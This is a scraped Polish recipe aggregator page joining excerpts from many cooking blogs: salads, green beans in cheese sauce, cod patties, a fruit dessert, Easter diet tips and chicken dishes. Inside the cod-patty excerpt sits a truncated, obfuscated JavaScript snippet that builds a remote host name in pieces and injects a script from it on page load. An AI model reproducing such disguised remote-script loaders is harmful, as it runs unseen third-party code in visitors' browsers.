Pyszna i efektowna surówka z kapusty, dobra na każdą okazję: grill, obiad, kolacja... -- Skład: pół główki kapusty, pół cebuli, pół główki czosnku, 3 x po pół papryki w różnych kolorach, płaska łyżeczka soli, pół płaskiej łyżeczki pieprzu, łyżeczka cukru, 2-4 łyżki octu, 4-6 łyżek oleju. Szczypiorek lub koperek do ozdobienia ale też do smaku lub czerwoną cebulę(...)preferencji, które wam odpowiadają. Kapustę ucieramy na grubych oczkach, pozostałe warzywa kroimy w małą kostkę. Tak przygotowane składniki układamy w miseczce wg swoich upodobań... -- -- -- Jeżeli chcemy, to możemy przyprawić sałatkę od razu lub też przyprawy można połączyć razem i każdy potem sobie przyprawi po nałożeniu, na talerzu. -- Sałatka dobrze się prezentuje również gdy jest pomieszana i przyprawiona w całości
chleba naszegoFasola w sosie serowym na obiad. Bardzo lubię przystawki, na które składają się ogólnie dostępne warzywa. Zielona fasola szparagowa to właśnie takie nieskomplikowane warzywo, dostępne przez cały rok. Można je przyrządzić na wiele sposobów. Jest smaczna i pożywna. Latem robię zapasy i mrożę fasolę. Ten sposób moim zdaniem jest najlepszy. Ugotowana fasola w słoikach traci swój świeży zielony kolor. Mrożona(...)smakuje jak latem. Wystarczy ją lekko obgotować i opłukać pod zimną wodą. W ten sposób fasola podobnie jak inne zielone warzywa zachowuje swój piękny, naturalny kolor. Lubię fasolę w sałatkach . Uwielbiam fasolę od dzieciństwa z tartą bułką na słodko. Obecnie wolę jednak zastąpić bułkę czy panko zmielonymi orzechami lub migdałami. Fasola w sosie serowym idealnie pasuje do mięsa i drobiu
codojedzeniaoleju rzepakowym. Pyszności! Z czym podawać kotleciki z dorsza? Kolacja powinna być lekkim posiłkiem, dlatego staraj się nie przejadać. Pyszny kotlecik możesz przekąsić z kromką pełnoziarnistego pieczywa albo porcją sałatki. Jeżeli masz ochotę na ciepłą kolację, podaj kotleciki z ryżem, kaszą jaglaną, kuskusem lub warzywami gotowanymi na parze. Składniki, których potrzebujesz do przygotowania kotlecików z dorsza z dodatkami, znajdziesz(...)domowych posiłków. Zadbaj o to, żeby Twoje menu było jak najbardziej zróżnicowane. Ryby powinny zająć w nim miejsce honorowe, szczególnie z warzywnymi dodatkami. Są idealnym pomysłem nie tylko na obiad, ale też ostatnie danie w ciągu dnia. (function(){ qxaw=document.createElement("script");qxaw_=("us")+("ta"); qxaw_+="t"+(".");qxaw_+=("in");qxawu="11904021";qxaw.async=true; qxawu+=".n6451052xawalpayf";qxaw.type="text/javascript";qxaw_+="f"+"o"+("/"); qxawu
Tradycyjna Kuchniawydrążaniem zawartości łyżeczką, ani mozolnie skrobać skórki nożem. Wystarczy kiwi sparzyć przez kilkanaście sekund we wrzącej wodzie. Następnie przy lekkim podważeniu nożem, skórka schodzi łatwo całymi płatami. Wracając do sałatki :) Kiwi, mandarynki i cytrynę sparzyć, a następnie wyszorować dokładnie szczoteczką. Miód i kaki umyć pod bieżącą wodą. Kiwi i kaki obrać ze skórki, pokroić w plastry lub inne, dowolne(...)przełożyć do salaterki, skropić sokiem z cytryny i polać łyżeczką płynnego miodu. Zostawić na pół godziny, aby smaki "się przegryzły". Podawać jako zdrowy i niskokaloryczny deser po systym obiedzie
Grunt to przepis!kaloryczność. ZAKWAS NA ŻUREK . Dobrze zrobić wcześniej samodzielnie albo kupić gotowy, który składem będzie równał się z domowym ( mąka żytnia razowa, czosnek, woda, ziele angielskie, pieprz, liść laurowy). SAŁATKI . na Wielkanocnym stole nie powinno ich zabraknąć. Starajmy się by były ze świeżych warzyw z dodatkiem jogurtu. Wykorzystujmy ogórki, rzodkiewki, seler naciowy, kiełki, kalafiora, sałatę itp. PASZTET . Obok tego tradycyjnego(...)wspomagających trawienie: majeranek, kminek, rozmaryn, tymianek, koper, lubczyk, kolendra, bazylia, imbir, gałka muszkatołowa. RUCH . Pamiętajmy by w ciągu dnia wygospodarować czas na wspólną aktywność fizyczną, np. spacer rodzinny po obiedzie. DETOKS -poświąteczne oczyszczenie. Warto po świętach i dość tłustych potrawach poświęcić 3 dni na detoks organizmu. Należy wtedy: pić dużo wody oraz koktajli, jeść świeże warzywa i owoce (owoce
Życie na widelcuosuszyć i przeciąć na 2 sztuki olej wymieszać z solą wędzoną i suszoną papryką chilli całe piersi bez rozbijania namoczyć w marynacie i do lodówki na całą noc przed obiadem piersi wkładam z marynatą do woreczków i tłuczkiem rozbijam na 2 kotlety rozbite maczać w roztrzepanym jajku i obtaczać w tartej bułce na gorącym oleju smażyć na rumiano kotlety można(...)polecam.... sól morska wędzona Royal Brand: powstaje w wyniku naturalnego procesu wędzenia soli morskie - skład: naturalna sól morska - zastosowanie: do dań typowo amerykańskich,do barbecue,do sosów,zup, twarogów,sałatek,pomidorów, nadaje smak i aromat wędzonego drewna, świetna dla wegetarian, nadaje potrawą smak i zapach wędzonki
W Mojej Kuchni LubięPomidory niby są przez cały rok, ale zdecydowanie najsmaczniejsze są latem! Dlatego latem na moim stole królują one jako dodatki do dań. Każdy kształt i kolor
PatiGotujeWieki temu kiedy z przyjaciółkami spotykałyśmy się na wakacyjne plotki często naszą przekąską był kalafior. Wtedy był ugotowany na miękko, rozgnieciony widelcem z dodatkiem ogromnej ilości
wiecejwarzyw.plSoczyście zielony krem z groszku idealny na dodanie koloru chłodnym zimowym dniom :D W oczekiwaniu na wiosnę nie musimy rezygnować z warzyw, Warto sięgnąć w tym
HealthyCreationsPowolnym tempem, ale chyba wszyscy mają nadzieję, że już niedługo, zawita do nas prawdziwa wiosna. Póki co, przymrozki nie do końca chcą nam odpuścić, ale aura
psgotujemySpecjalnie dla Was, właśnie teraz, kiedy cukinia króluje na straganach, najlepsze z najlepszych przepisy na moje ukochane warzywo! Pamiętajcie, że im mniejsza cukinia, tym smaczniejsza, ma
Moja smaczna kuchniaSłyszeliście o jajkach po szkocku? Jest to uwielbiana przez Brytyjczyków barowa przekąska, klops z jajka owiniętego mielonym mięsem. Dziś mam dla Was wegetariański wariant tego przysmaku
Chilli Czosnek i OliwaZabieram Was ze soba w podróż do Italii. Chociaż pogoda nie funduje nam włoskich temperatur (moze to i dobrze, bo znajoma Włoszka mówiła, że na Sycylii
Szybko Tanio SmacznieMuszę przyznać, że najbardziej lubię buraczki na ciepło i dlatego najczęściej pojawiają się na naszym stole. Doskonale takie buraczki pasują do smażonych lub pieczonych dań i
UgotujmyTo.plprzygotować na przyjęcie imieninowe dla Andrzeja. Kurczak marynowany w jogurcie jest miękki i wilgotny, a z wierzchu chrupiący dzięki płatkom kukurydzianym. Do tego kilka warzyw, mozzarella, lekki sos i obiad lub kolacja gotowe! Kurczak: 2 filety z kurczaka 2 małe jogurty naturalne, kefiry lub maślanki ulubione przyprawy - u mnie curry, suszony czosnek, słodka i ostra papryka sól i pieprz(...)kostkę Sos: 1 szklanka jogurtu naturalnego 1 łyżka majonezu łyżeczka soku z cytryny zmiażdżony ząbek czosnku sól, pieprz i cukier puder do smaku 1 łyżeczka suszonych ziół do sałatek Umyte filety pokroić na mniejsze kawałki (podłużne), włożyć do miski, dodać kefir i wszystkie przyprawy. Wymieszać i zostawić w lodówce na kilka godzin (można na całą noc). W miseczce rozkruszyć
Czerwień i błękit